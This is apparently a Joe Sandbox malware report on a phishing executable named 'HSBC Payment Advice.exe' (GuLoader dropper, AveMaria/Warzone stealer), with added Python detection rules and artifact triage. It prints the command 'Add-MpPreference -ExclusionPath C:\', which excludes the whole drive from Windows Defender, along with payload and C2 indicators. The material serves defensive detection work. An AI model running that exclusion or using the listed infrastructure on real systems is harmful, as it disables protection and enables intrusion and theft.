C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat
C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat
C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat
C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll
C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll (3x)
C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat
C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat
C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat
C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll
C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll
C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat (2x)
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll
C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat (2x)
C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll
C:\
C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat
C:\
C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat
These are the file checks PowerShell makes while loading its .NET assemblies and the Defender management module (note the Windows-Defender-Management-Powershell-Group catalog); they are a side effect of running Add-MpPreference, not an evasion on their own.

Lowering of HIPS / PFW / Operating System Security Settings:

Increases the number of concurrent connections per server for Internet Explorer
Source: C:\Users\user\Desktop\HSBC Payment Advice.exe | Registry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, MaxConnectionsPerServer = 10
This is the WinINet per-host connection cap for the current user; raising it lets anything in the session that goes through WinINet (the sample's memory carries a wininet.dll reference next to its User-Agent string) open more parallel connections to a single server.
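As an added example, not part of the report, here is the detection logic a SOC would derive from the Defender exclusion under "HIPS / PFW / Operating System Protection Evasion" and from the MaxConnectionsPerServer write above, run over constructed Sysmon-style events: rule 1 mirrors the "Powershell Defender Exclusion" Sigma signature the report cites and rates a whole-drive or executable-extension exclusion above a narrow one; rule 2 flags the WinINet connection limit being set by a process that is not a browser. The event dictionaries, the SID placeholder and the iexplore.exe allow-list are assumptions of the example, not data from the report.

```python
import re
from typing import Dict, List, NamedTuple, Optional

# Sysmon event IDs for the two event kinds the rules consume.
PROCESS_CREATE = 1
REGISTRY_VALUE_SET = 13


class Alert(NamedTuple):
    rule: str
    severity: str
    image: str
    detail: str


MP_CMDLET = re.compile(r"(?i)\b(?:Add|Set)-MpPreference\b")
# PowerShell binds any unambiguous parameter prefix, so "-ExclusionPa" works like
# "-ExclusionPath": match the prefix and take everything up to the next parameter.
EXCLUSION_PARAM = re.compile(r"(?i)-(Exclusion\w*)\s+(.+?)(?=\s+-\w|$)")
RISKY_EXTENSIONS = {"exe", "dll", "ps1", "bat", "cmd", "vbs", "js", "scr"}
# Processes expected to write the WinINet connection limit (assumption; tune per estate).
EXPECTED_REGISTRY_WRITERS = {"iexplore.exe"}


def is_broad_path(path: str) -> bool:
    """Whole drives and well-known writable roots defeat Defender for everything under them."""
    p = path.strip().strip("\"'").rstrip("\\").lower()
    if re.fullmatch(r"[a-z]:", p):
        return True
    return p.rsplit("\\", 1)[-1] in {"programdata", "users", "public", "windows", "temp", "appdata"}


def defender_exclusion(ev: Dict) -> Optional[Alert]:
    """Rule 1: Add-/Set-MpPreference carrying an -Exclusion* parameter."""
    if ev.get("EventID") != PROCESS_CREATE:
        return None
    cmd = ev.get("CommandLine", "")
    if not MP_CMDLET.search(cmd):
        return None
    hits = EXCLUSION_PARAM.findall(cmd)
    if not hits:
        return None
    severity, values = "medium", []
    for param, raw in hits:
        for value in (v.strip().strip("\"'") for v in raw.split(",")):
            values.append(value)
            if param.lower().startswith("exclusionpa") and is_broad_path(value):
                severity = "high"
            if param.lower().startswith("exclusione") and value.lstrip(".").lower() in RISKY_EXTENSIONS:
                severity = "high"
    return Alert("Defender exclusion added via PowerShell", severity, ev.get("Image", ""), ", ".join(values))


def ie_connection_limit(ev: Dict) -> Optional[Alert]:
    """Rule 2: MaxConnectionsPerServer written by something other than a browser."""
    if ev.get("EventID") != REGISTRY_VALUE_SET:
        return None
    if not ev.get("TargetObject", "").lower().endswith("\\internet settings\\maxconnectionsperserver"):
        return None
    image = ev.get("Image", "")
    if image.rsplit("\\", 1)[-1].lower() in EXPECTED_REGISTRY_WRITERS:
        return None
    return Alert("MaxConnectionsPerServer set by non-browser process", "medium", image, ev.get("Details", ""))


RULES = (defender_exclusion, ie_connection_limit)


def evaluate(events: List[Dict]) -> List[Alert]:
    """Run every rule over every event and collect the alerts in event order."""
    alerts = []
    for ev in events:
        for rule in RULES:
            alert = rule(ev)
            if alert is not None:
                alerts.append(alert)
    return alerts


# Constructed Sysmon-style events. The first and fifth mirror the report's own lines
# (powershell Add-MpPreference -ExclusionPath C:\ and the MaxConnectionsPerServer write);
# the others are made-up controls. The SID in the key path is a placeholder.
PS32 = "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe"
PS64 = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
IE_KEY = ("HKU\\S-1-5-21-EXAMPLE\\Software\\Microsoft\\Windows\\CurrentVersion"
          "\\Internet Settings\\MaxConnectionsPerServer")
EVENTS = [
    {"EventID": 1, "Image": PS32, "ParentImage": "C:\\Users\\user\\Desktop\\HSBC Payment Advice.exe",
     "CommandLine": "powershell Add-MpPreference -ExclusionPath C:\\"},
    {"EventID": 1, "Image": PS64, "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell.exe -nop Set-MpPreference -ExclusionExt exe,dll -Force"},
    {"EventID": 1, "Image": PS64, "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell Add-MpPreference -ExclusionPa \"C:\\Tools\\Backup\""},
    {"EventID": 1, "Image": PS64, "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell Get-MpPreference"},
    {"EventID": 13, "Image": "C:\\Users\\user\\Desktop\\HSBC Payment Advice.exe",
     "TargetObject": IE_KEY, "Details": "DWORD (0x0000000a)"},
    {"EventID": 13, "Image": "C:\\Program Files\\Internet Explorer\\iexplore.exe",
     "TargetObject": IE_KEY, "Details": "DWORD (0x0000000a)"},
]

if __name__ == "__main__":
    for a in evaluate(EVENTS):
        print(f"[{a.severity}] {a.rule}: {a.image} -> {a.detail}")
```

The parent image is carried in the events but not used by the rules; in production, a non-shell parent such as HSBC Payment Advice.exe spawning powershell.exe is the strongest single signal and is worth a third rule. Values containing " -" inside quotes would be cut short by the look-ahead; tokenise the command line properly if that matters in your telemetry.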

Stealing of Sensitive Information:

Yara detected Generic Dropper
Source: Yara match | File source: Process Memory Space: HSBC Payment Advice.exe PID: 5816, type: MEMORYSTR
Yara detected AveMaria stealer
Source: Yara match | File source: 12.3.HSBC Payment Advice.exe.1b2fab0.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000003.501858409.0000000001B2F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, type: MEMORY
GuLoader behavior detected
Source: Initial file | Signature Results: GuLoader behavior
Source: Yara match | File source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: HSBC Payment Advice.exe PID: 5816, type: MEMORYSTR

Remote Access Functionality:

Yara detected AveMaria stealer
Source: Yara match | File source: 12.3.HSBC Payment Advice.exe.1b2fab0.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000003.501858409.0000000001B2F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

The report's matrix is rendered here per tactic. A number in parentheses is the signature-count badge the report attaches to that technique, kept as rendered; techniques without one are the unpopulated cells of the standard matrix and carry no matched signature in this analysis.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Windows Management Instrumentation; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection (12); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading (3); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (221); Process Injection (12); Hidden Files and Directories (1); Hidden Users (1); Obfusc ated Files or Information (1); Software Packing (1)
Credential Access: Input Capture (11); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: Security Software Discovery (41); Process Discovery (2); Virtualization/Sandbox Evasion (221); Application Window Discovery (1); Remote System Discovery (1); System Information Discovery (12); Network Sniffing; Network Service Scanning
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
Collection: Input Capture (11); Archive Collected Data (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Command and Control: Encrypted Channel (11); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (213); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Endpoint Denial of Service (1); Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue

Behavior Graph

Behavior Graph ID: 528768 | Sample: HSBC Payment Advice.exe | Start date: 25/11/2021 | Architecture: WINDOWS | Score: 100
Contacted hosts: spuredge.com; barr2.ddns.net
Top-level signatures: Multi AV Scanner detection for domain / URL; Potential malicious icon found; Found malware configuration; 17 other signatures

Process tree recovered from the graph (node numbers are the graph's own):
HSBC Payment Advice.exe (node 9) [Tries to detect Any.run; Hides threads from debuggers]
  HSBC Payment Advice.exe (node 12; badges 4 and 11, which the legend lists as created registry values and created files) [Adds a directory exclusion to Windows Defender; Tries to detect Any.run; Increases the number of concurrent connection per server for Internet Explorer; 2 other signatures]
    network: spuredge.com 38.103.244.107 port 443 from local ports 49784 and 49823, AS FHLB-OFUS, United States
    dropped: C:\ProgramData\images.exe (PE32); C:\ProgramData\images.exe:Zone.Identifier (ASCII)
    images.exe (node 17) [Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Tries to detect Any.run; Hides threads from debuggers]
      images.exe (node 22) [Tries to detect Any.run; Hides threads from debuggers]
    powershell.exe (node 20; badge 25)
      conhost.exe (node 25)


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
HSBC Payment Advice.exe | 56% | Virustotal
HSBC Payment Advice.exe | 20% | Metadefender
HSBC Payment Advice.exe | 49% | ReversingLabs | Win32.Downloader.GuLoader
HSBC Payment Advice.exe | 100% | Joe Sandbox ML

Dropped Files

Source | Detection | Scanner | Label
C:\ProgramData\images.exe | 100% | Joe Sandbox ML
C:\ProgramData\images.exe | 56% | Virustotal
C:\ProgramData\images.exe | 20% | Metadefender
C:\ProgramData\images.exe | 49% | ReversingLabs | Win32.Downloader.GuLoader
The dropped file has the same hashes as the initial sample (see Created / dropped Files), so the verdicts are necessarily identical.

Unpacked PE Files

All twelve unpacked images below are flagged 100% by Avira as TR/Dropper.VB.Gen:
12.0.HSBC Payment Advice.exe.400000.1.unpack
12.0.HSBC Payment Advice.exe.400000.3.unpack
28.0.images.exe.400000.0.unpack
12.0.HSBC Payment Advice.exe.400000.0.unpack
28.0.images.exe.400000.1.unpack
0.0.HSBC Payment Advice.exe.400000.0.unpack
21.2.images.exe.400000.0.unpack
21.0.images.exe.400000.0.unpack
0.2.HSBC Payment Advice.exe.400000.0.unpack
12.0.HSBC Payment Advice.exe.400000.2.unpack
28.0.images.exe.400000.2.unpack
28.0.images.exe.400000.3.unpack

Domains

Source | Detection | Scanner
spuredge.com | 12% | Virustotal

URLs

Source | Detection | Scanner | Label
https://spuredge.com/warzone_JBBOxCEy72.bin | 0% | Avira URL Cloud | safe
Avira URL Cloud rates the payload URL "safe" while the same report marks it malicious under Contacted URLs; URL reputation lags for newly seen download paths, so do not let a "safe" verdict override the memory evidence above.

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
barr2.ddns.net | 194.5.97.4 | true | true | - | unknown
spuredge.com | 38.103.244.107 | true | true | - | unknown
barr2.ddns.net is the dynamic-DNS name behind the "Uses dynamic DNS services" signature; spuredge.com hosts the second-stage download.

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
https://spuredge.com/warzone_JBBOxCEy72.bin | true | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://github.com/syohex/java-simple-mine-sweeperC: | HSBC Payment Advice.exe, 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp; HSBC Payment Advice.exe, 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp; HSBC Payment Advice.exe, 0000000C.00000003.501858409.0000000001B2F000.00000004.00000001.sdmp; HSBC Payment Advice.exe, 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp | false | - | high

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
38.103.244.107 | spuredge.com | United States | 40695 | FHLB-OFUS | true

                  General Information

                  Joe Sandbox Version:34.0.0 Boulder Opal
                  Analysis ID:528768
                  Start date:25.11.2021
                  Start time:18:47:52
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 8m 33s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Sample file name:HSBC Payment Advice.exe
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:29
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.rans.phis.troj.spyw.expl.evad.winEXE@10/6@3/1
                  EGA Information:Failed
                  HDC Information:
                  • Successful, ratio: 91.8% (good quality ratio 62.6%)
                  • Quality average: 41.9%
                  • Quality standard deviation: 35.3%
                  HCA Information:Failed
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240s for sample files taking high CPU consumption
                  Warnings:
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                  • TCP Packets have been reduced to 100
                  • Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200
                  • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, www.bing.com, dual-a-0001.dc-msedge.net, client.wns.windows.com, fs.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Not all processes were analyzed; the report is missing behavior information
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.

                  Simulations

                  Behavior and APIs

Time | Type | Description
18:50:53 | API Interceptor | 28x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

spuredge.com was seen in eight earlier analyses, all detected as malicious and all resolving to 164.90.131.131 at the time:
HSBC Customer Information.exe
HSBC Customer Information.exe
SecuriteInfo.com.W32.AIDetect.malware2.27504.exe
BENEFICIARY PAYMENT NOTICE.exe
Invoice-NBM01557.exe
HSBC Customer Information.exe
HSBC Payment Advice.exe
Invoice-NBM01557.exe
In this run the domain resolves to 38.103.244.107 instead, so the hosting has moved between analyses; pivot on the domain and the payload path rather than on the IP.

ASN

FHLB-OFUS (AS40695) appears in two earlier malicious analyses:
husAc5LfPP, contacting 38.103.146.9
mips, contacting 38.103.254.188

JA3 Fingerprints

JA3 37f463bf4616ecd445d4a1937da06e19 was seen in twenty earlier malicious analyses, every one of them talking to 38.103.244.107:
duLT5gkRjy.exe
duLT5gkRjy.exe
EaCmG75WxF.exe
fpvN6iDp5r.msi
EaCmG75WxF.exe
Se adjunta el pedido, proforma.exe
Statement.html
Michal November 23, 2021.html
survey-1384723731.xls
Wfedtqxbgeorkwcgiehsnsjbdjghrpjtlr.exe
survey-1378794827.xls
Zr26f1rL6r.exe
mN2NobuuDv.exe
cs.exe
ORDINE + DDT A.M.F SpA.exe
mal1.html
5A15ECE1649A5EF54B70B95D9D413BAD068B8C1C932E2.exe
DOC5629.htm
Racun je u prilogu.exe
exe.exe
JA3 hashes the TLS client hello, so one value shared by executables, an MSI, spreadsheets and HTML pages mostly reflects the same Windows TLS stack in the analysis VM rather than a common malware family. Combined with that mix of sample types on a single address, 38.103.244.107 looks like shared hosting; neither the JA3 nor the IP is a strong pivot on its own.

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\ProgramData\images.exe
                  Process:C:\Users\user\Desktop\HSBC Payment Advice.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):111776
                  Entropy (8bit):5.9797505021512665
                  Encrypted:false
                  SSDEEP:1536:d0a5ea6eyr8W6sWZrV64JPS8K8VZBeFR1JVk0A9p:d0Ja6e86smc4JhKmZBMR1JK0A9p
                  MD5:A069E61B357F625A7B3595150412C42D
                  SHA1:5FA560D04B13DB7E0216BDA2CA5F1C3B94A8912E
                  SHA-256:0FB47A47BC025991B3ED8895AA84030DEF6E5CC538A9CEC279A73F4528D549C6
                  SHA-512:BF5C8D398A219E35048AA096C5C8F6A699EDC8FFB63570AA8678F593DA324421DFA19154A725E84F84AF266320C90A88852328EF666826A750BDC992F4DFF66F
                  Malicious:true
                  Antivirus:
                  • Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Virustotal, Detection: 56%
• Antivirus: Metadefender, Detection: 20%
                  • Antivirus: ReversingLabs, Detection: 49%
                  Reputation:low
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............i...i...i...d...i.Rich..i.................PE..L...&..K.....................0....................@.........................................................................t...(.......N................................................................... ... ....................................text....t.......................... ..`.data...4...........................@....rsrc...N...........................@..@...I............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................................................................
                  C:\ProgramData\images.exe:Zone.Identifier
                  Process:C:\Users\user\Desktop\HSBC Payment Advice.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:modified
                  Size (bytes):26
                  Entropy (8bit):3.95006375643621
                  Encrypted:false
                  SSDEEP:3:ggPYV:rPYV
                  MD5:187F488E27DB4AF347237FE461A079AD
                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                  Malicious:true
                  Reputation:high, very likely benign file
                  Preview: [ZoneTransfer]....ZoneId=0
                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):22268
                  Entropy (8bit):5.605280175734106
                  Encrypted:false
                  SSDEEP:384:FtCDqElDmQsq+sYhRYSBKnYjultI2j7Y9gtSJ3x+T1MarZlbAV7W3WDmZBDI+iuC:2s744KYCltZXtc0CSfw6RVW
                  MD5:76A8F16698B242D790634A3A452C6E2B
                  SHA1:99053AB5F93F1FE29FE01A5EA48FE23687FA2DF5
                  SHA-256:FC9861C453F85E3130FE483937FB57C36A30B3508397813C6E81C5F3516307AA
                  SHA-512:B501F13DA22E864C6C6FA463D430ED3520C03167E7DA6468313F5CDDD8BEC09522E5754177E8C1B55CCFB24B64B6B292B102532B0A06FA89D43C45E34EECEE14
                  Malicious:false
                  Reputation:low
                  Preview: @...e...........v.......h...W.P.M.....:...I..........@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rkoahsjv.1ht.ps1
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview: 1
                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tubbusjo.0kz.psm1
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview: 1
                  C:\Users\user\Documents\20211125\PowerShell_transcript.051829.7+5fXBbe.20211125185051.txt
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):5072
                  Entropy (8bit):5.382415440050556
                  Encrypted:false
                  SSDEEP:96:BZ646EeN5qqDo1ZwwZ66EeN5qqDo1ZBM6UjZ66EeN5qqDo1ZKFEE8Z3:1KbKOKE
                  MD5:6BFB8157D1151FE07FEA9D44ECA37EDF
                  SHA1:2476FF605738DCEEE7AFBD7F2F59C942AB4D9183
                  SHA-256:E8683A6B7380D857B8F1912F18323981E8A851197DE7F46E8834F53AB5657757
                  SHA-512:6970864B49468B4C1496D6BFE17941AD3A6A3F945C467BF45EBDE56D58D7166E7746E87A08516830F9884DE01C8289AF97ED4FFA1543860386596FDB444969BB
                  Malicious:false
                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20211125185053..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 051829 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -ExclusionPath C:\..Process ID: 7140..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211125185053..**********************..PS>Add-MpPreference -ExclusionPath C:\..**********************..Windows PowerShell transcript start..Start time: 20211125185436..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 051829 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPr
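Three of the dropped artifacts above are small enough that the report's previews show them in full, which makes them a good test bed for scripting the checks this section implies: the entropy and hash figures listed per file, the Zone.Identifier stream that the dropper writes with ZoneId=0 (the behaviour flagged as hiding that the file came from the Internet), and the PowerShell transcript that records Add-MpPreference -ExclusionPath C:\. The following is an added example and not part of the sandbox report; its inputs are reconstructed from the previews (the ".." runs in a preview are CRLF pairs, which is what gives the stream its reported 26 bytes), and the exclusion-parameter list and severity rule are the author's own choices.

```python
"""Triage of the dropped artifacts that the report previews in full: per-file
8-bit Shannon entropy and hashes (the figures listed above), the
Zone.Identifier stream the dropper writes with ZoneId=0, and the PowerShell
transcript that records the Defender exclusion. Added example, stdlib only;
the three inputs are reconstructed from the previews, not copied from the
sandbox (".." in a preview is a CRLF pair)."""
import hashlib
import math
import re
from collections import Counter

# Reconstructed: images.exe:Zone.Identifier (26 bytes) and the 1-byte
# __PSScriptPolicyTest_*.ps1/.psm1 probes PowerShell writes on start-up.
ZONE_STREAM = b"[ZoneTransfer]\r\nZoneId=0\r\n"
POLICY_PROBE = b"1"

# Reconstructed from the transcript preview (header block plus the command record).
TRANSCRIPT = "\r\n".join([
    "**********************",
    "Windows PowerShell transcript start",
    "Start time: 20211125185053",
    "Username: computer\\user",
    "RunAs User: computer\\user",
    "Configuration Name: ",
    "Machine: 051829 (Microsoft Windows NT 10.0.17134.0)",
    "Host Application: powershell Add-MpPreference -ExclusionPath C:\\",
    "Process ID: 7140",
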